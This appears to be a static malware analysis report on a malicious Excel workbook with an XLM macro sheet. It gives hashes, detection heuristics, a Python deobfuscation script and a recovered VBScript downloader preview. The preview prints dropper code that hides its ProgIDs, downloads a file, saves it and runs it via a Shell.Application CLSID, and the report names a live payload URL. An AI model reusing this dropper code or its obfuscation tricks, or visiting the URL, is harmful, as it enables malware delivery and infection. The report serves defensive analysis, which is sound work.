Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 d1e19a6c116e4b01…

MALICIOUS

Office (OOXML) / .XLSX

Size: 429.9 KB
Created: 2025-07-15 05:45:39 UTC
Authoring application: Microsoft Excel 15.0300
First seen: 2026-05-13
MD5: 22f95e27ba803a6212e0bd27ff6e9c44
SHA-1: d256251aefd81bacc226021d0ead0ce15fba9391
SHA-256: d1e19a6c116e4b01fb9042a7b2806e88a25e132aa58b2998c4191d1cb680e2ed
Risk score: 182

Heuristics (4)

  • Excel 4.0 macro sheet (1 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
  • XLM payload reassembled from CHAR()/split formulas critical OOXML_XLM_REASSEMBLED_PAYLOAD
    An Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL — the de-obfuscated download-and-run kill chain.
  • URL reconstructed from XLM cell array (1 URL) critical OOXML_XLM_CELL_ARRAY_URL
    Excel 4.0 macro sheet stages its payload URL across individual numeric cells (one ASCII charcode per cell), inside an embedded HTA that uses VBScript Chr()/&-concat obfuscation, or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF12 record stream of every worksheet and macrosheet part and decoding RK/inline-string/shared-string cells in row-major and column-major order plus FORMULA cell-reference concatenation in token order.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://astaoffices.com/mx/mx.vbs (referenced by macro)
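The two reassembly heuristics above (per-character CHAR()/fragment concatenation, and a URL staged one charcode per cell or across fragment cells joined by reference) and the VBScript &-concatenation visible in the preview further down all come down to one step: evaluate string-building expressions over a map of cell or variable values. The script below is an added example of that step, not the scanner's own code. It assumes an upstream BIFF12/XML cell extractor has already produced the name -> value map; the sample maps are constructed (the report's URL, the preview's variable assignments), and the join of the preview's path fragments into C:\Users\Public\gxkp96.vbs is an assumption, not something the preview shows contiguously.

```python
"""Rebuild strings that an XLM macro sheet (or the VBScript it drops) assembles from CHAR()/Chr(),
fragment cells and & / CONCATENATE. Added example for this report, not the scanner's code. Input is a
name -> value map (cell address or script variable -> literal or "=expression"); SAMPLE_* are constructed."""
import re

TOKEN_RE = re.compile(r'\s*("(?:[^"]|"")*"|\d+(?:\.\d+)?|[A-Za-z_$][\w$.!]*|[&(),])')
VALID_RE = re.compile(r"(?:%s)*\s*" % TOKEN_RE.pattern)
REF_RE = re.compile(r"^(?:[\w.]+!)?\$?([A-Za-z]{1,3})\$?(\d+)$")
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
FUNCS = {"CHAR": lambda a: chr(int(float(a[0]))), "CONCATENATE": "".join, "CONCAT": "".join}
FUNCS["CHR"] = FUNCS["CHAR"]  # VBScript spelling, same semantics for the ASCII range used here

def _key(name):  # one flat, case-insensitive map: no $ anchors, no sheet qualifier
    return name.replace("$", "").upper().split("!")[-1]

def as_text(val):  # Excel renders the number 104 as "104" when concatenated, never "104.0"
    return str(int(val)) if isinstance(val, (int, float)) and float(val).is_integer() else str(val)

class Resolver:
    """expr := term ('&' term)*;  term := string | number | FUNC(args) | name (resolved recursively)."""
    def __init__(self, env):
        self.env = {_key(k): v for k, v in env.items()}

    def resolve(self, formula):
        expr = formula.lstrip("=").strip()
        if not VALID_RE.fullmatch(expr):
            raise ValueError(f"cannot tokenize {expr!r}")
        toks = [m.group(1) for m in TOKEN_RE.finditer(expr)]
        text, i = self._expr(toks, 0)
        if i != len(toks):
            raise ValueError(f"trailing tokens {toks[i:]}")
        return text

    def lookup(self, name):
        val = self.env.get(_key(name), "")  # an empty cell concatenates as ""
        return self.resolve(val) if isinstance(val, str) and val.startswith("=") else as_text(val)

    def _expr(self, toks, i):
        text, i = self._term(toks, i)
        while i < len(toks) and toks[i] == "&":
            more, i = self._term(toks, i + 1)
            text += more
        return text, i

    def _term(self, toks, i):  # raises IndexError/KeyError on truncated or unsupported input
        t = toks[i]
        if t.startswith('"'):
            return t[1:-1].replace('""', '"'), i + 1
        if t[0].isdigit():
            return as_text(float(t)), i + 1
        if i + 1 < len(toks) and toks[i + 1] == "(":  # FUNC(arg, arg, ...)
            args, i = [], i + 2
            while toks[i] != ")":
                arg, i = self._expr(toks, i)
                args.append(arg)
                i += toks[i] == ","  # skip a separating comma (bool adds 0 or 1)
            return FUNCS[t.upper()](args), i + 1
        return self.lookup(t), i + 1

def charcode_runs(cells, column_major=False):
    """Decode runs of adjacent cells each holding one printable ASCII code, along rows or down columns."""
    pts = {}
    for addr, val in cells.items():
        m = REF_RE.match(addr)
        if m and not isinstance(val, str) and val == int(val) and 32 <= int(val) < 127:
            col = sum((ord(c) - 64) * 26 ** k for k, c in enumerate(reversed(m.group(1).upper())))
            pts[(col, int(m.group(2))) if column_major else (int(m.group(2)), col)] = chr(int(val))
    runs = []
    for (fixed, moving), ch in sorted(pts.items()):  # a cell's predecessor always sorts right before it
        if (fixed, moving - 1) in pts:
            runs[-1] += ch
        else:
            runs.append(ch)
    return [r for r in runs if len(r) > 1]

def reassemble(cells):
    """{name: decoded text} for every formula/expression, plus every charcode run found."""
    r, out = Resolver(cells), {}
    for name, val in cells.items():
        if isinstance(val, str) and val.startswith("="):
            try:
                out[name] = r.resolve(val)
            except (ValueError, KeyError, IndexError, RecursionError):
                pass  # unsupported function, malformed formula or circular reference: leave undecoded
    for order, flag in (("row", False), ("col", True)):
        for n, run in enumerate(charcode_runs(cells, flag)):
            out[f"{order}-major run {n}"] = run
    return out

def find_urls(cells):
    return sorted({m.group(0) for t in reassemble(cells).values() for m in URL_RE.finditer(t)})

# Constructed sample: the report's URL one charcode per cell down column B; a command split across
# fragment cells (joining the preview's fragments this way is an assumption); formulas rebuilding both.
SAMPLE_XLM = {f"B{i + 1}": ord(ch) for i, ch in enumerate("http://astaoffices.com/mx/mx.vbs")}
SAMPLE_XLM.update({"D1": "wscr", "D2": "ipt ", "D3": "C:\\Users\\Public\\", "D4": "gxkp96.vbs",
                   "F1": '=CHAR(104)&CHAR(116)&CHAR(116)&CHAR(112)&":"',
                   "F2": "=CONCATENATE(D1,D2,$D$3&D4)",
                   "F3": '=F1&"//"&CHAR(97)&"staoffices.com/mx/mx.vbs"'})
# Constructed sample: the preview's variable assignments plus its two createobject() arguments as "=expression".
SAMPLE_VBS = {"c3r9ia": "micrOs", "wp5jaj": "aDo", "onre5r": "db.sTr", "dnehbm": "oft.xmlh",
              "stream_progid": '=wp5jaj & onre5r & "eam"', "http_progid": '=c3r9ia & dnehbm & "TTP"'}
```

find_urls(SAMPLE_XLM) yields the single report URL from both the column-B charcode run and formula F3, and reassemble(SAMPLE_VBS) turns the createobject() arguments into aDodb.sTream and micrOsoft.xmlhTTP (case-mangled ADODB.Stream and Microsoft.XMLHTTP). Cells that use a function outside the supported set, a truncated formula, or a circular reference are left undecoded rather than guessed at. The part not shown is the feeder the report describes: walking the BIFF12 records of every worksheet and macrosheet part and decoding RK, inline-string and shared-string cells into this map.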

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_sheet_00.bin
Kind: xlm-macrosheet
Source: OOXML XLM macro sheet: xl/macrosheets/sheet1.bin
Size: 3303 bytes
SHA-256: d2aa6a28c23bb3ba1be77eb80f9b7ffdb99a85c2ec3c6509fc01333020d6240f
Preview script
The extracted part is a BIFF12 record stream, not a text script, so the rendered preview is mostly binary. Listed below are the UTF-16 strings recovered from it in stream order, with record framing and non-text bytes omitted and unreadable spans marked [..]:

  kfu  C:\Users\Public\  BX
  fil  gxkp96.vbs
  On Error Resume Next
  c3r9ia = "micrOs"
  wp5jaj = "aDo"
  onre5r = "db.sTr"
  dnehbm = "oft.xmlh"
  r2jps7 = "[..]"
  dim wrb4yz: Set wrb4yz = createobject(wp5jaj & onre5r & "eam")
  dim ngkkck: Set ngkkck = createobject(c3r9ia & dnehbm & "TTP")
  ngkkck.Open "GET", r2jps7, False
  ngkkck.Send
  with wrb4yz
    .type = 1
    .open
    .write ngkkck.responseBody
    .savetofile "C[..]Mswords.vbs", 2
  end with
  GetObject("new:13709620-C279-11CE-A49E-444553540000").Open("C[..]Mswords.vbs")
  Err.Clear
  wscript C[..]gxkp96.vbs
  SHA-512

Resolving the concatenations: wp5jaj & onre5r & "eam" is "aDodb.sTream" (ADODB.Stream) and c3r9ia & dnehbm & "TTP" is "micrOsoft.xmlhTTP" (Microsoft.XMLHTTP); the split and mixed case defeat literal ProgID matching while CreateObject itself is case-insensitive. The script issues an HTTP GET to r2jps7 (its value is not readable in this preview), writes the response body to Mswords.vbs through a binary ADODB.Stream (.type = 1, SaveToFile mode 2 = create-or-overwrite), and launches that file with GetObject("new:<CLSID>").Open, where 13709620-C279-11CE-A49E-444553540000 is the Shell.Application CLSID and the "new:" moniker instantiates it by CLSID without naming the ProgID. On Error Resume Next plus Err.Clear swallow any failure silently. The C:\Users\Public\ and gxkp96.vbs fragments and the trailing "wscript [..] gxkp96.vbs" string are consistent with the macro sheet writing these lines to a .vbs under C:\Users\Public\ and executing it with wscript; the "SHA-512" string at the end belongs to the workbook's own protection/hash metadata, not the payload.